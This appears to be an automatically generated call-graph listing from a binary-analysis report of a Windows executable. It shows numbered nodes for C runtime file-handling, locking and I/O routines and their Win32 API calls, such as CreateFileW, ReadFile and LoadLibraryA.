99420->99461 99444 1b0857 99422->99444 99462 1a8d68 58 API calls __getptd_noexit 99423->99462 99425 1a54cf _doexit @_EH4_CallFilterFunc@8 99425->99366 99430 1b0744 _doexit 99429->99430 99431 1a9e4b __lock 58 API calls 99430->99431 99441 1b0752 99431->99441 99432 1b07c6 99464 1b084e 99432->99464 99433 1b07cd 99469 1a8a5d 58 API calls 2 library calls 99433->99469 99436 1b0843 _doexit 99436->99418 99437 1b07d4 99437->99432 99470 1aa06b InitializeCriticalSectionAndSpinCount 99437->99470 99438 1a9ed3 __mtinitlocknum 58 API calls 99438->99441 99441->99432 99441->99433 99441->99438 99467 1a6e8d 59 API calls __lock 99441->99467 99468 1a6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99441->99468 99442 1b07fa EnterCriticalSection 99442->99432 99453 1b0877 __wopenfile 99444->99453 99445 1b0891 99475 1a8d68 58 API calls __getptd_noexit 99445->99475 99447 1b0a4c 99447->99445 99451 1b0aaf 99447->99451 99448 1b0896 99476 1a8ff6 9 API calls ___strgtold12_l 99448->99476 99450 1a5540 99463 1a5562 LeaveCriticalSection LeaveCriticalSection _fprintf 99450->99463 99472 1b87f1 99451->99472 99453->99445 99453->99447 99453->99453 99477 1a3a0b 60 API calls 2 library calls 99453->99477 99455 1b0a45 99455->99447 99478 1a3a0b 60 API calls 2 library calls 99455->99478 99457 1b0a64 99457->99447 99479 1a3a0b 60 API calls 2 library calls 99457->99479 99459->99414 99460->99425 99461->99425 99462->99425 99463->99425 99471 1a9fb5 LeaveCriticalSection 99464->99471 99466 1b0855 99466->99436 99467->99441 99468->99441 99469->99437 99470->99442 99471->99466 99480 1b7fd5 99472->99480 99474 1b880a 99474->99450 99475->99448 99476->99450 99477->99455 99478->99457 99479->99447 99483 1b7fe1 _doexit 99480->99483 99481 1b7ff7 99565 1a8d68 58 API calls __getptd_noexit 99481->99565 99483->99481 99485 1b802d 99483->99485 99484 1b7ffc 99566 1a8ff6 9 API calls ___strgtold12_l 99484->99566 99491 1b809e 99485->99491 99488 1b8049 99567 1b8072 LeaveCriticalSection __unlock_fhandle 99488->99567 99490 1b8006 _doexit 99490->99474 99492 1b80be 99491->99492 99493 1a471a __wsopen_nolock 58 API calls 99492->99493 99496 1b80da 99493->99496 99494 1a9006 __invoke_watson 8 API calls 99495 1b87f0 99494->99495 99497 1b7fd5 __wsopen_helper 103 API calls 99495->99497 99498 1b8114 99496->99498 99505 1b8137 99496->99505 99564 1b8211 99496->99564 99499 1b880a 99497->99499 99500 1a8d34 __close 58 API calls 99498->99500 99499->99488 99501 1b8119 99500->99501 99502 1a8d68 ___strgtold12_l 58 API calls 99501->99502 99503 1b8126 99502->99503 99506 1a8ff6 ___strgtold12_l 9 API calls 99503->99506 99504 1b81f5 99507 1a8d34 __close 58 API calls 99504->99507 99505->99504 99512 1b81d3 99505->99512 99508 1b8130 99506->99508 99509 1b81fa 99507->99509 99508->99488 99510 1a8d68 ___strgtold12_l 58 API calls 99509->99510 99511 1b8207 99510->99511 99513 1a8ff6 ___strgtold12_l 9 API calls 99511->99513 99514 1ad4d4 __alloc_osfhnd 61 API calls 99512->99514 99513->99564 99515 1b82a1 99514->99515 99516 1b82ab 99515->99516 99517 1b82ce 99515->99517 99519 1a8d34 __close 58 API calls 99516->99519 99518 1b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99517->99518 99529 1b82f0 99518->99529 99520 1b82b0 99519->99520 99521 1a8d68 ___strgtold12_l 58 API calls 99520->99521 99523 1b82ba 99521->99523 99522 1b836e GetFileType 99524 1b83bb 99522->99524 99525 1b8379 GetLastError 99522->99525 99527 1a8d68 ___strgtold12_l 58 API calls 99523->99527 99536 1ad76a __set_osfhnd 59 API calls 99524->99536 99528 1a8d47 __dosmaperr 58 API calls 99525->99528 99526 1b833c GetLastError 99530 1a8d47 __dosmaperr 58 API calls 99526->99530 99527->99508 99531 1b83a0 CloseHandle 99528->99531 99529->99522 99529->99526 99532 1b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99529->99532 99533 1b8361 99530->99533 99531->99533 99534 1b83ae 99531->99534 99535 1b8331 99532->99535 99537 1a8d68 ___strgtold12_l 58 API calls 99533->99537 99538 1a8d68 ___strgtold12_l 58 API calls 99534->99538 99535->99522 99535->99526 99540 1b83d9 99536->99540 99537->99564 99539 1b83b3 99538->99539 99539->99533 99541 1b8594 99540->99541 99542 1b1b11 __lseeki64_nolock 60 API calls 99540->99542 99560 1b845a 99540->99560 99543 1b8767 CloseHandle 99541->99543 99541->99564 99544 1b8443 99542->99544 99545 1b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99543->99545 99547 1a8d34 __close 58 API calls 99544->99547 99544->99560 99546 1b878e 99545->99546 99549 1b87c2 99546->99549 99550 1b8796 GetLastError 99546->99550 99547->99560 99548 1b10ab 70 API calls __read_nolock 99548->99560 99549->99564 99551 1a8d47 __dosmaperr 58 API calls 99550->99551 99553 1b87a2 99551->99553 99552 1b848c 99555 1b99f2 __chsize_nolock 82 API calls 99552->99555 99552->99560 99556 1ad67d __free_osfhnd 59 API calls 99553->99556 99554 1b0d2d __close_nolock 61 API calls 99554->99560 99555->99552 99556->99549 99557 1adac6 __write 78 API calls 99557->99560 99558 1b8611 99559 1b0d2d __close_nolock 61 API calls 99558->99559 99561 1b8618 99559->99561 99560->99541 99560->99548 99560->99552 99560->99554 99560->99557 99560->99558 99562 1b1b11 60 API calls __lseeki64_nolock 99560->99562 99563 1a8d68 ___strgtold12_l 58 API calls 99561->99563 99562->99560 99563->99564 99564->99494 99565->99484 99566->99490 99567->99490 99569 184ce1 99568->99569 99570 184d9d LoadLibraryA 99568->99570 99569->99370 99569->99373 99570->99569 99571 184dae GetProcAddress 99570->99571 99571->99569 99573 185003 FindResourceExW 99572->99573 99577 185020 99572->99577 99574 1bdd5c LoadResource 99573->99574 99573->99577 99575 1bdd71 SizeofResource 99574->99575 99574->99577 99576 1bdd85 LockResource 99575->99576 99575->99577 99576->99577 99577->99379 99579 185054 99578->99579 99580 1bddd4 99578->99580 99584 1a5a7d 99579->99584 99582 185062 99582->99386 99583->99379 99585 1a5a89 _doexit 99584->99585 99586 1a5a9b 99585->99586 99587 1a5ac1 99585->99587 99597 1a8d68 58 API calls __getptd_noexit 99586->99597 99599 1a6e4e 99587->99599 99590 1a5aa0 99598 1a8ff6 9 API calls ___strgtold12_l 99590->99598 99591 1a5ac7 99605 1a59ee 83 API calls 5 library calls 99591->99605 99594 1a5ad6 99606 1a5af8 LeaveCriticalSection LeaveCriticalSection _fprintf 99594->99606 99596 1a5aab _doexit 99596->99582 99597->99590 99598->99596 99600 1a6e5e 99599->99600 99601 1a6e80 EnterCriticalSection 99599->99601 99600->99601 99602 1a6e66 99600->99602 99603 1a6e76 99601->99603 99604 1a9e4b __lock 58 API calls 99602->99604 99603->99591 99604->99603 99605->99594 99606->99596 99610 1a582d 99607->99610 99609 18508e 99609->99398 99611 1a5839 _doexit 99610->99611 99612 1a584f _memset 99611->99612 99613 1a587c 99611->99613 99614 1a5874 _doexit 99611->99614 99637 1a8d68 58 API calls __getptd_noexit 99612->99637 99615 1a6e4e __lock_file 59 API calls 99613->99615 99614->99609 99616 1a5882 99615->99616 99623 1a564d 99616->99623 99618 1a5869 99638 1a8ff6 9 API calls ___strgtold12_l 99618->99638 99626 1a5668 _memset 99623->99626 99629 1a5683 99623->99629 99624 1a5673 99735 1a8d68 58 API calls __getptd_noexit 99624->99735 99626->99624 99626->99629 99630 1a56c3 99626->99630 99639 1a58b6 LeaveCriticalSection LeaveCriticalSection _fprintf 99629->99639 99630->99629 99631 1a57d4 _memset 99630->99631 99640 1a4916 99630->99640 99647 1b10ab 99630->99647 99715 1b0df7 99630->99715 99737 1b0f18 58 API calls 3 library calls 99630->99737 99738 1a8d68 58 API calls __getptd_noexit 99631->99738 99636 1a5678 99736 1a8ff6 9 API calls ___strgtold12_l 99636->99736 99637->99618 99638->99614 99639->99614 99641 1a4920 99640->99641 99642 1a4935 99640->99642 99739 1a8d68 58 API calls __getptd_noexit 99641->99739 99642->99630 99644 1a4925 99740 1a8ff6 9 API calls ___strgtold12_l 99644->99740 99646 1a4930 99646->99630 99648 1b10cc 99647->99648 99649 1b10e3 99647->99649 99750 1a8d34 58 API calls __getptd_noexit 99648->99750 99651 1b181b 99649->99651 99655 1b111d 99649->99655 99766 1a8d34 58 API calls __getptd_noexit 99651->99766 99652 1b10d1 99751 1a8d68 58 API calls __getptd_noexit 99652->99751 99657 1b1125 99655->99657 99663 1b113c 99655->99663 99656 1b1820 99767 1a8d68 58 API calls __getptd_noexit 99656->99767 99752 1a8d34 58 API calls __getptd_noexit 99657->99752 99659 1b1131 99768 1a8ff6 9 API calls ___strgtold12_l 99659->99768 99661 1b112a 99753 1a8d68 58 API calls __getptd_noexit 99661->99753 99664 1b1151 99663->99664 99666 1b116b 99663->99666 99668 1b1189 99663->99668 99695 1b10d8 99663->99695 99754 1a8d34 58 API calls __getptd_noexit 99664->99754 99666->99664 99672 1b1176 99666->99672 99755 1a8a5d 58 API calls 2 library calls 99668->99755 99670 1b1199 99673 1b11bc 99670->99673 99674 1b11a1 99670->99674 99741 1b5ebb 99672->99741 99758 1b1b11 60 API calls 3 library calls 99673->99758 99756 1a8d68 58 API calls __getptd_noexit 99674->99756 99675 1b128a 99677 1b1303 ReadFile 99675->99677 99682 1b12a0 GetConsoleMode 99675->99682 99680 1b17e3 GetLastError 99677->99680 99681 1b1325 99677->99681 99679 1b11a6 99757 1a8d34 58 API calls __getptd_noexit 99679->99757 99684 1b17f0 99680->99684 99685 1b12e3 99680->99685 99681->99680 99689 1b12f5 99681->99689 99686 1b1300 99682->99686 99687 1b12b4 99682->99687 99764 1a8d68 58 API calls __getptd_noexit 99684->99764 99697 1b12e9 99685->99697 99759 1a8d47 58 API calls 3 library calls 99685->99759 99686->99677 99687->99686 99690 1b12ba ReadConsoleW 99687->99690 99689->99697 99698 1b135a 99689->99698 99707 1b15c7 99689->99707 99690->99689 99692 1b12dd GetLastError 99690->99692 99691 1b17f5 99765 1a8d34 58 API calls __getptd_noexit 99691->99765 99692->99685 99695->99630 99696 1a2f95 _free 58 API calls 99696->99695 99697->99695 99697->99696 99699 1b13c6 ReadFile 99698->99699 99705 1b1447 99698->99705 99701 1b13e7 GetLastError 99699->99701 99709 1b13f1 99699->99709 99701->99709 99702 1b1504 99711 1b14b4 MultiByteToWideChar 99702->99711 99762 1b1b11 60 API calls 3 library calls 99702->99762 99703 1b14f4 99761 1a8d68 58 API calls __getptd_noexit 99703->99761 99704 1b16cd ReadFile 99708 1b16f0 GetLastError 99704->99708 99714 1b16fe 99704->99714 99705->99697 99705->99702 99705->99703 99705->99711 99707->99697 99707->99704 99708->99714 99709->99698 99760 1b1b11 60 API calls 3 library calls 99709->99760 99711->99692 99711->99697 99714->99707 99763 1b1b11 60 API calls 3 library calls 99714->99763 99716 1b0e02 99715->99716 99720 1b0e17 99715->99720 99802 1a8d68 58 API calls __getptd_noexit 99716->99802 99718 1b0e07 99803 1a8ff6 9 API calls ___strgtold12_l 99718->99803 99721 1b0e4c 99720->99721 99729 1b0e12 99720->99729 99804 1b6234 58 API calls __malloc_crt 99720->99804 99723 1a4916 __filbuf 58 API calls 99721->99723 99724 1b0e60 99723->99724 99769 1b0f97 99724->99769 99726 1b0e67 99727 1a4916 __filbuf 58 API calls 99726->99727 99726->99729 99728 1b0e8a 99727->99728 99728->99729 99730 1a4916 __filbuf 58 API calls 99728->99730 99729->99630 99731 1b0e96 99730->99731 99731->99729 99732 1a4916 __filbuf 58 API calls 99731->99732 99733 1b0ea3 99732->99733 99734 1a4916 __filbuf 58 API calls 99733->99734 99734->99729 99735->99636 99736->99629 99737->99630 99738->99636 99739->99644 99740->99646 99742 1b5ed3 99741->99742 99743 1b5ec6 99741->99743 99745 1b5edf 99742->99745 99746 1a8d68 ___strgtold12_l 58 API calls 99742->99746 99744 1a8d68 ___strgtold12_l 58 API calls 99743->99744 99747 1b5ecb 99744->99747 99745->99675 99748 1b5f00 99746->99748 99747->99675 99749 1a8ff6 ___strgtold12_l 9 API calls 99748->99749 99749->99747 99750->99652 99751->99695 99752->99661 99753->99659 99754->99661 99755->99670 99756->99679 99757->99695 99758->99672 99759->99697 99760->99709 99761->99697 99762->99711 99763->99714 99764->99691 99765->99697 99766->99656 99767->99659 99768->99695 99770 1b0fa3 _doexit 99769->99770 99771 1b0fb0 99770->99771 99772 1b0fc7 99770->99772 99773 1a8d34 __close 58 API calls 99771->99773 99774 1b108b 99772->99774 99775 1b0fdb 99772->99775 99777 1b0fb5 99773->99777 99776 1a8d34 __close 58 API calls 99774->99776 99778 1b0ff9 99775->99778 99779 1b1006 99775->99779 99780 1b0ffe 99776->99780 99781 1a8d68 ___strgtold12_l 58 API calls 99777->99781 99782 1a8d34 __close 58 API calls 99778->99782 99783 1b1028 99779->99783 99784 1b1013 99779->99784 99788 1a8d68 ___strgtold12_l 58 API calls 99780->99788 99785 1b0fbc _doexit 99781->99785 99782->99780 99787 1ad446 ___lock_fhandle 59 API calls 99783->99787 99786 1a8d34 __close 58 API calls 99784->99786 99785->99726 99789 1b1018 99786->99789 99790 1b102e 99787->99790 99794 1b1020 99788->99794 99791 1a8d68 ___strgtold12_l 58 API calls 99789->99791 99792 1b1041 99790->99792 99793 1b1054 99790->99793 99791->99794 99796 1b10ab __read_nolock 70 API calls 99792->99796 99795 1a8d68 ___strgtold12_l 58 API calls 99793->99795 99797 1a8ff6 ___strgtold12_l 9 API calls 99794->99797 99798 1b1059 99795->99798 99799 1b104d 99796->99799 99797->99785 99800 1a8d34 __close 58 API calls 99798->99800 99801 1b1083 __read LeaveCriticalSection 99799->99801 99800->99799 99801->99785 99802->99718 99803->99729 99804->99721 99808 1a543a GetSystemTimeAsFileTime 99805->99808 99807 1e91f8 99807->99400 99809 1a5468 __aulldiv 99808->99809 99809->99807 99811 1a5e9c _doexit 99810->99811 99812 1a5eae 99811->99812 99813 1a5ec3 99811->99813 99824 1a8d68 58 API calls __getptd_noexit 99812->99824 99814 1a6e4e __lock_file 59 API calls 99813->99814 99816 1a5ec9 99814->99816 99826 1a5b00 67 API calls 5 library calls 99816->99826 99817 1a5eb3 99825 1a8ff6 9 API calls ___strgtold12_l 99817->99825 99820 1a5ed4 99827 1a5ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 99820->99827 99822 1a5ee6 99823 1a5ebe _doexit 99822->99823 99823->99405 99824->99817 99825->99823 99826->99820 99827->99822 99828->99289 99829->99291 99830->99288 99831->99297 99833 1892c9 Mailbox 99832->99833 99834 1bf5c8 99833->99834 99839 1892d3 99833->99839 99835 1a0ff6 Mailbox 59 API calls 99834->99835 99837 1bf5d4 99835->99837 99836 1892da 99836->99302 99839->99836 99840 189df0 59 API calls Mailbox 99839->99840 99840->99839 99841->99311 99842->99312 99848 1e99d2 __tzset_nolock _wcscmp 99843->99848 99844 18506b 74 API calls 99844->99848 99845 1e9866 99845->99318 99845->99347 99846 1e9393 GetSystemTimeAsFileTime 99846->99848 99847 185045 85 API calls 99847->99848 99848->99844 99848->99845 99848->99846 99848->99847 99850 1e8da9 99849->99850 99851 1e8d9b 99849->99851 99853 1e8dee 99850->99853 99854 1a548b 115 API calls 99850->99854 99879 1e8db2 99850->99879 99852 1a548b 115 API calls 99851->99852 99852->99850 99880 1e901b 99853->99880 99856 1e8dd3 99854->99856 99856->99853 99857 1e8ddc 99856->99857 99861 1a55d6 __fcloseall 83 API calls 99857->99861 99857->99879 99858 1e8e32 99859 1e8e36 99858->99859 99860 1e8e57 99858->99860 99864 1a55d6 __fcloseall 83 API calls 99859->99864 99865 1e8e43 99859->99865 99884 1e8c33 99860->99884 99861->99879 99864->99865 99868 1a55d6 __fcloseall 83 API calls 99865->99868 99865->99879 99866 1e8e85 99893 1e8eb5 99866->99893 99867 1e8e65 99869 1e8e72 99867->99869 99872 1a55d6 __fcloseall 83 API calls 99867->99872 99868->99879 99874 1a55d6 __fcloseall 83 API calls 99869->99874 99869->99879 99872->99869 99874->99879 99876 1e8ea0 99878 1a55d6 __fcloseall 83 API calls 99876->99878 99876->99879 99878->99879 99879->99346 99881 1e9040 99880->99881 99883 1e9029 __tzset_nolock _memmove 99880->99883 99882 1a5812 __fread_nolock 74 API calls 99881->99882 99882->99883 99883->99858 99885 1a594c _W_store_winword 58 API calls 99884->99885 99886 1e8c42 99885->99886 99887 1a594c _W_store_winword 58 API calls 99886->99887 99888 1e8c56 99887->99888 99889 1a594c _W_store_winword 58 API calls 99888->99889 99890 1e8c6a 99889->99890 99891 1e8f97 58 API calls 99890->99891 99892 1e8c7d 99890->99892 99891->99892 99892->99866 99892->99867 99897 1e8eca 99893->99897 99894 1e8f82 99922 1e91bf 99894->99922 99896 1e8c8f 74 API calls 99896->99897 99897->99894 99897->99896 99900 1e8e8c 99897->99900 99926 1e8d2b 74 API calls 99897->99926 99927 1e909c 80 API calls 99897->99927 99901 1e8f97 99900->99901 99902 1e8faa 99901->99902 99903 1e8fa4 99901->99903 99905 1e8fbb 99902->99905 99907 1a2f95 _free 58 API calls 99902->99907 99904 1a2f95 _free 58 API calls 99903->99904 99904->99902 99906 1e8e93 99905->99906 99908 1a2f95 _free 58 API calls 99905->99908 99906->99876 99909 1a55d6 99906->99909 99907->99905 99908->99906 99910 1a55e2 _doexit 99909->99910 99911 1a560e 99910->99911 99912 1a55f6 99910->99912 99914 1a6e4e __lock_file 59 API calls 99911->99914 99918 1a5606 _doexit 99911->99918 100009 1a8d68 58 API calls __getptd_noexit 99912->100009 99916 1a5620 99914->99916 99915 1a55fb 100010 1a8ff6 9 API calls ___strgtold12_l 99915->100010 99993 1a556a 99916->99993 99918->99876 99923 1e91cc 99922->99923 99924 1e91dd 99922->99924 99928 1a4a93 99923->99928 99924->99900 99926->99897 99927->99897 99929 1a4a9f _doexit 99928->99929 99930 1a4abd 99929->99930 99931 1a4ad5 99929->99931 99940 1a4acd _doexit 99929->99940 99953 1a8d68 58 API calls __getptd_noexit 99930->99953 99932 1a6e4e __lock_file 59 API calls 99931->99932 99934 1a4adb 99932->99934 99941 1a493a 99934->99941 99935 1a4ac2 99954 1a8ff6 9 API calls ___strgtold12_l 99935->99954 99940->99924 99944 1a4949 99941->99944 99947 1a4967 99941->99947 99942 1a4957 99984 1a8d68 58 API calls __getptd_noexit 99942->99984 99944->99942 99944->99947 99948 1a4981 _memmove 99944->99948 99945 1a495c 99985 1a8ff6 9 API calls ___strgtold12_l 99945->99985 99955 1a4b0d LeaveCriticalSection LeaveCriticalSection _fprintf 99947->99955 99948->99947 99951 1a4916 __filbuf 58 API calls 99948->99951 99956 1adac6 99948->99956 99986 1a4c6d 99948->99986 99992 1ab05e 78 API calls 7 library calls 99948->99992 99951->99948 99953->99935 99954->99940 99955->99940 99957 1adad2 _doexit 99956->99957 99958 1adadf 99957->99958 99959 1adaf6 99957->99959 99960 1a8d34 __close 58 API calls 99958->99960 99961 1adb95 99959->99961 99963 1adb0a 99959->99963 99962 1adae4 99960->99962 99964 1a8d34 __close 58 API calls 99961->99964 99965 1a8d68 ___strgtold12_l 58 API calls 99962->99965 99966 1adb28 99963->99966 99967 1adb32 99963->99967 99968 1adb2d 99964->99968 99979 1adaeb _doexit 99965->99979 99969 1a8d34 __close 58 API calls 99966->99969 99970 1ad446 ___lock_fhandle 59 API calls 99967->99970 99972 1a8d68 ___strgtold12_l 58 API calls 99968->99972 99969->99968 99971 1adb38 99970->99971 99973 1adb4b 99971->99973 99974 1adb5e 99971->99974 99975 1adba1 99972->99975 99976 1adbb5 __write_nolock 76 API calls 99973->99976 99978 1a8d68 ___strgtold12_l 58 API calls 99974->99978 99977 1a8ff6 ___strgtold12_l 9 API calls 99975->99977 99980 1adb57 99976->99980 99977->99979 99981 1adb63 99978->99981 99979->99948 99983 1adb8d __write LeaveCriticalSection 99980->99983 99982 1a8d34 __close 58 API calls 99981->99982 99982->99980 99983->99979 99984->99945 99985->99947 99987 1a4ca4 99986->99987 99988 1a4c80 99986->99988 99987->99948 99988->99987 99989 1a4916 __filbuf 58 API calls 99988->99989 99990 1a4c9d 99989->99990 99991 1adac6 __write 78 API calls 99990->99991 99991->99987 99992->99948 99994 1a5579 99993->99994 99996 1a558d 99993->99996 100042 1a8d68 58 API calls __getptd_noexit 99994->100042 99995 1a5589 100011 1a5645 LeaveCriticalSection LeaveCriticalSection _fprintf 99995->100011 99996->99995 99998 1a4c6d __flush 78 API calls 99996->99998 100001 1a5599 99998->100001 99999 1a557e 100043 1a8ff6 9 API calls ___strgtold12_l 99999->100043 100012 1b0dc7 100001->100012 100004 1a4916 __filbuf 58 API calls 100005 1a55a7 100004->100005 100016 1b0c52 100005->100016 100007 1a55ad 100007->99995 100008 1a2f95 _free 58 API calls 100007->100008 100008->99995 100009->99915 100010->99918 100011->99918 100013 1a55a1 100012->100013 100014 1b0dd4 100012->100014 100013->100004 100014->100013 100015 1a2f95 _free 58 API calls 100014->100015 100015->100013 100017 1b0c5e _doexit 100016->100017 100018 1b0c6b 100017->100018 100019 1b0c82 100017->100019 100068 1a8d34 58 API calls __getptd_noexit 100018->100068 100021 1b0d0d 100019->100021 100024 1b0c92 100019->100024 100073 1a8d34 58 API calls __getptd_noexit 100021->100073 100023 1b0c70 100069 1a8d68 58 API calls __getptd_noexit 100023->100069 100025 1b0cba 100024->100025 100026 1b0cb0 100024->100026 100044 1ad446 100025->100044 100070 1a8d34 58 API calls __getptd_noexit 100026->100070 100027 1b0cb5 100074 1a8d68 58 API calls __getptd_noexit 100027->100074 100032 1b0cc0 100034 1b0cde 100032->100034 100035 1b0cd3 100032->100035 100033 1b0d19 100075 1a8ff6 9 API calls ___strgtold12_l 100033->100075 100071 1a8d68 58 API calls __getptd_noexit 100034->100071 100053 1b0d2d 100035->100053 100038 1b0c77 _doexit 100038->100007 100040 1b0cd9 100072 1b0d05 LeaveCriticalSection __unlock_fhandle 100040->100072 100042->99999 100043->99995 100045 1ad452 _doexit 100044->100045 100046 1ad4a1 EnterCriticalSection 100045->100046 100048 1a9e4b __lock 58 API calls 100045->100048 100047 1ad4c7 _doexit 100046->100047 100047->100032 100049 1ad477 100048->100049 100050 1ad48f 100049->100050 100076 1aa06b InitializeCriticalSectionAndSpinCount 100049->100076 100077 1ad4cb LeaveCriticalSection _doexit 100050->100077 100078 1ad703 100053->100078 100055 1b0d91 100091 1ad67d 59 API calls 2 library calls 100055->100091 100057 1b0d3b 100057->100055 100059 1ad703 __close_nolock 58 API calls 100057->100059 100067 1b0d6f 100057->100067 100058 1b0d99 100065 1b0dbb 100058->100065 100092 1a8d47 58 API calls 3 library calls 100058->100092 100061 1b0d66 100059->100061 100060 1ad703 __close_nolock 58 API calls 100062 1b0d7b FindCloseChangeNotification 100060->100062 100066 1ad703 __close_nolock 58 API calls 100061->100066 100062->100055 100063 1b0d87 GetLastError 100062->100063 100063->100055 100065->100040 100066->100067 100067->100055 100067->100060 100068->100023 100069->100038 100070->100027 100071->100040 100072->100038 100073->100027 100074->100033 100075->100038 100076->100050 100077->100046 100079 1ad70e 100078->100079 100080 1ad723 100078->100080 100081 1a8d34 __close 58 API calls 100079->100081 100083 1a8d34 __close 58 API calls 100080->100083 100085 1ad748 100080->100085 100082 1ad713 100081->100082 100084 1a8d68 ___strgtold12_l 58 API calls 100082->100084 100086 1ad752 100083->100086 100088 1ad71b 100084->100088 100085->100057 100087 1a8d68 ___strgtold12_l 58 API calls 100086->100087 100089 1ad75a 100087->100089 100088->100057 100090 1a8ff6 ___strgtold12_l 9 API calls 100089->100090 100090->100088 100091->100058 100092->100065 100094 1b1b90 __ftell_nolock 100093->100094 100095 1a09e2 GetLongPathNameW 100094->100095 100096 187d2c 59 API calls 100095->100096 100097 18741d 100096->100097 100098 18716b 100097->100098 100099 1877c7 59 API calls 100098->100099 100100 18717d 100099->100100 100101 1848ae 60 API calls 100100->100101 100102 187188 100101->100102 100103 187193 100102->100103 100107 1becae 100102->100107 100104 183f84 59 API calls 100103->100104 100106 18719f 100104->100106 100145 1834c2 100106->100145 100108 1becc8 100107->100108 100151 187a68 61 API calls 100107->100151 100110 1871b2 Mailbox 100110->99109 100112 184f3d 136 API calls 100111->100112 100113 1869ef 100112->100113 100114 1be45a 100113->100114 100115 184f3d 136 API calls 100113->100115 100116 1e97e5 122 API calls 100114->100116 100117 186a03 100115->100117 100118 1be46f 100116->100118 100117->100114 100119 186a0b 100117->100119 100120 1be473 100118->100120 100121 1be490 100118->100121 100123 1be47b 100119->100123 100124 186a17 100119->100124 100125 184faa 84 API calls 100120->100125 100122 1a0ff6 Mailbox 59 API calls 100121->100122 100141 1be4d5 Mailbox 100122->100141 100245 1e4534 90 API calls _wprintf 100123->100245 100152 186bec 100124->100152 100125->100123 100128 1be489 100128->100121 100130 1be689 100131 1a2f95 _free 58 API calls 100130->100131 100132 1be691 100131->100132 100133 184faa 84 API calls 100132->100133 100138 1be69a 100133->100138 100137 1a2f95 _free 58 API calls 100137->100138 100138->100137 100140 184faa 84 API calls 100138->100140 100251 1dfcb1 89 API calls 4 library calls 100138->100251 100140->100138 100141->100130 100141->100138 100142 187f41 59 API calls 100141->100142 100246 1dfc4d 59 API calls 2 library calls 100141->100246 100247 1dfb6e 61 API calls 2 library calls 100141->100247 100248 1e7621 59 API calls Mailbox 100141->100248 100249 18766f 59 API calls 2 library calls 100141->100249 100250 1874bd 59 API calls Mailbox 100141->100250 100142->100141 100147 1834d4 100145->100147 100150 1834f3 _memmove 100145->100150 100146 1a0ff6 Mailbox 59 API calls 100149 18350a 100146->100149 100148 1a0ff6 Mailbox 59 API calls 100147->100148 100148->100150 100149->100110 100150->100146 100151->100107 100153 1be847 100152->100153 100154 186c15 100152->100154 100343 1dfcb1 89 API calls 4 library calls 100153->100343 100257 185906 60 API calls Mailbox 100154->100257 100157 186c37 100258 185956 100157->100258 100158 1be85a 100344 1dfcb1 89 API calls 4 library calls 100158->100344 100161 186c54 100163 1877c7 59 API calls 100161->100163 100165 186c60 100163->100165 100164 1be876 100166 186cc1 100164->100166 100271 1a0b9b 60 API calls __ftell_nolock 100165->100271 100168 1be889 100166->100168 100169 186ccf 100166->100169 100171 185dcf CloseHandle 100168->100171 100172 1877c7 59 API calls 100169->100172 100170 186c6c 100173 1877c7 59 API calls 100170->100173 100174 1be895 100171->100174 100175 186cd8 100172->100175 100176 186c78 100173->100176 100177 184f3d 136 API calls 100174->100177 100178 1877c7 59 API calls 100175->100178 100179 1848ae 60 API calls 100176->100179 100181 1be8b1 100177->100181 100182 186ce1 100178->100182 100180 186c86 100179->100180 100272 1859b0 ReadFile SetFilePointerEx 100180->100272 100184 1be8da 100181->100184 100187 1e97e5 122 API calls 100181->100187 100281 1846f9 100182->100281 100345 1dfcb1 89 API calls 4 library calls 100184->100345 100186 186cb2 100273 185c4e 100186->100273 100191 1be8cd 100187->100191 100188 186cf8 100192 187c8e 59 API calls 100188->100192 100194 1be8f6 100191->100194 100195 1be8d5 100191->100195 100196 186d09 SetCurrentDirectoryW 100192->100196 100193 1be8f1 100223 186e6c Mailbox 100193->100223 100197 184faa 84 API calls 100194->100197 100198 184faa 84 API calls 100195->100198 100201 186d1c Mailbox 100196->100201 100199 1be8fb 100197->100199 100198->100184 100200 1a0ff6 Mailbox 59 API calls 100199->100200 100207 1be92f 100200->100207 100203 1a0ff6 Mailbox 59 API calls 100201->100203 100205 186d2f 100203->100205 100204 183bcd 100204->98968 100204->98977 100206 18538e 59 API calls 100205->100206 100346 18766f 59 API calls 2 library calls 100207->100346 100212 1beb69 100352 1e7581 59 API calls Mailbox 100212->100352 100216 1beb8b 100353 1ef835 59 API calls 2 library calls 100216->100353 100219 1beb98 100220 1a2f95 _free 58 API calls 100219->100220 100220->100223 100252 185934 100223->100252 100235 1be978 Mailbox 100235->100212 100236 187f41 59 API calls 100235->100236 100240 1bebbb 100235->100240 100347 1dfc4d 59 API calls 2 library calls 100235->100347 100348 1dfb6e 61 API calls 2 library calls 100235->100348 100349 1e7621 59 API calls Mailbox 100235->100349 100350 18766f 59 API calls 2 library calls 100235->100350 100351 187373 59 API calls Mailbox 100235->100351 100236->100235 100354 1dfcb1 89 API calls 4 library calls 100240->100354 100242 1bebd4 100243 1a2f95 _free 58 API calls 100242->100243 100244 1bebe7 100243->100244 100244->100223 100245->100128 100246->100141 100247->100141 100248->100141 100249->100141 100250->100141 100251->100138 100253 185dcf CloseHandle 100252->100253 100254 18593c Mailbox 100253->100254 100255 185dcf CloseHandle 100254->100255 100256 18594b 100255->100256 100256->100204 100257->100157 100259 185dcf CloseHandle 100258->100259 100260 185962 100259->100260 100357 185df9 100260->100357 100262 185981 100266 1859a4 100262->100266 100365 185770 100262->100365 100264 185993 100382 1853db SetFilePointerEx SetFilePointerEx 100264->100382 100266->100158 100266->100161 100267 18599a 100267->100266 100268 1be030 100267->100268 100383 1e3696 SetFilePointerEx SetFilePointerEx WriteFile 100268->100383 100270 1be060 100270->100266 100271->100170 100272->100186 100274 185c68 100273->100274 100275 185cef SetFilePointerEx 100274->100275 100276 1be151 100274->100276 100280 185cc3 100274->100280 100389 185dae SetFilePointerEx 100275->100389 100390 185dae SetFilePointerEx 100276->100390 100279 1be16b 100280->100166 100282 1877c7 59 API calls 100281->100282 100283 18470f 100282->100283 100284 1877c7 59 API calls 100283->100284 100285 184717 100284->100285 100286 1877c7 59 API calls 100285->100286 100287 18471f 100286->100287 100288 1877c7 59 API calls 100287->100288 100289 184727 100288->100289 100290 1bd8fb 100289->100290 100291 18475b 100289->100291 100292 1881a7 59 API calls 100290->100292 100293 1879ab 59 API calls 100291->100293 100294 1bd904 100292->100294 100295 184769 100293->100295 100296 